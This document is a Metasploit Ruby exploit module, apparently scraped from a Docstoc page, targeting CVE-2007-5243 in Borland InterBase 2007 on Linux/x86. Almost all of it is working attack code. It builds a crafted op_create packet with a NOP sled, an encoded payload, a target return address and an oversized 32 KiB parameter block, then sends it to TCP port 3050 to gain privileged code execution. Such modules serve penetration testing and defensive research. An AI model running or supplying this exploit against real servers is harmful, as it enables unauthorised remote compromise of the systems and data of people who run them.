Borland InterBase 2007_ 2007 sp2 jrd8_create_database Buffer Overflow

Document Sample
Borland InterBase 2007_ 2007 sp2 jrd8_create_database Buffer Overflow Powered By Docstoc
					                 Borland InterBase 2007, 2007 sp2 jrd8_create_database Buffer Overflow                                     Page 1/3
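##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

# The listing was extracted with typographic quotes (’msf/core’), which
# Ruby does not treat as a string literal; restored to plain ASCII quotes.
require 'msf/core'

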
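class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp

  # Module metadata for CVE-2007-5243: a stack overflow in Borland
  # InterBase's jrd8_create_database(), reached over TCP (default port
  # 3050) with a single crafted op_create request. Linux/x86 only.
  #
  # The extracted listing used typographic quotes and Unicode minus signs
  # throughout ('Name', 2007−5243, 4 − remainder); all of those are plain
  # ASCII here so the module actually parses.
  def initialize(info = {})
    super(update_info(info,
      'Name'             => 'Borland InterBase jrd8_create_database() Buffer Overflow',
      'Description'      => %q{
          This module exploits a stack overflow in Borland InterBase
          by sending a specially crafted create request.
      },
      'Version'          => '$Revision$',
      'Author'           =>
        [
          'ramon',
          'Adriano Lima <adriano@risesecurity.org>',
        ],
      'Arch'             => ARCH_X86,
      'Platform'         => 'linux',
      'References'       =>
        [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38606' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
        ],
      # Metasploit's flag that a successful payload runs with the
      # service's (elevated) privileges rather than an unprivileged user's.
      'Privileged'       => true,
      'License'          => MSF_LICENSE,
      'Payload'          =>
        {
          # Must stay below the 540 bytes of request body left after the
          # return address; see #exploit.
          'Space' => 128,
          # NUL, '/', ':', '@' and '\' may not appear in the encoded payload.
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
        },
      'Targets'          =>
        [
          # 0x0804cbe4 pop esi; pop ebp; ret
          [
            'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',
            { 'Ret' => 0x0804cbe4 }
          ],
        ],
      'DefaultTarget'    => 0
    ))

    register_options(
      [
        Opt::RPORT(3050)
      ],
      self.class
    )
  end

  # Build and send one op_create packet, then hand off to the payload
  # handler and close the connection.
  #
  # Wire layout (all lengths big-endian 32-bit):
  #   op code | id | body length | body (NOP sled, payload, ret, padding) |
  #   DPB length | DPB data
  # The body is a fixed 544 bytes; the database parameter block (DPB)
  # that follows is an oversized 32 KiB of random alpha data, presumably
  # the field that overruns the stack buffer in jrd8_create_database().
  #
  # Raises ArgumentError if the encoded payload does not fit in the body;
  # the 'Space' limit in the metadata should make that unreachable, but a
  # negative NOP count would otherwise be passed to make_nops silently.
  def exploit
    op_create = 20    # InterBase op code for "create database"
    length    = 544   # size of the request body, as advertised and sent

    # Pad the body to a 4-byte boundary (XDR-style alignment).
    padding = (4 - length % 4) % 4

    # Space for the NOP sled: the body minus the payload and the 4-byte
    # return address that terminates it.
    nop_len = length - payload.encoded.length - 4
    if nop_len < 0
      raise ArgumentError, "encoded payload (#{payload.encoded.length} bytes) exceeds the #{length - 4}-byte request body"
    end

    buf = ''

    # Operation/packet type
    buf << [op_create].pack('N')

    # Id
    buf << [0].pack('N')

    # Body length
    buf << [length].pack('N')

    # Execution is expected to land in this NOP sled
    buf << make_nops(nop_len)

    # Payload
    buf << payload.encoded

    # Return address for the selected target, little-endian (x86)
    buf << [target.ret].pack('V')

    # Alignment padding
    buf << "\x00" * padding

    # Database parameter block: length field, then the data itself
    buf << [1024 * 32].pack('N')
    buf << rand_text_alpha(1024 * 32)

    # Connect only once the request is fully built so no socket is left
    # open if construction fails.
    connect

    print_status("Sending #{buf.length} byte op_create request...")
    sock.put(buf)

    handler
    disconnect
  end

end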



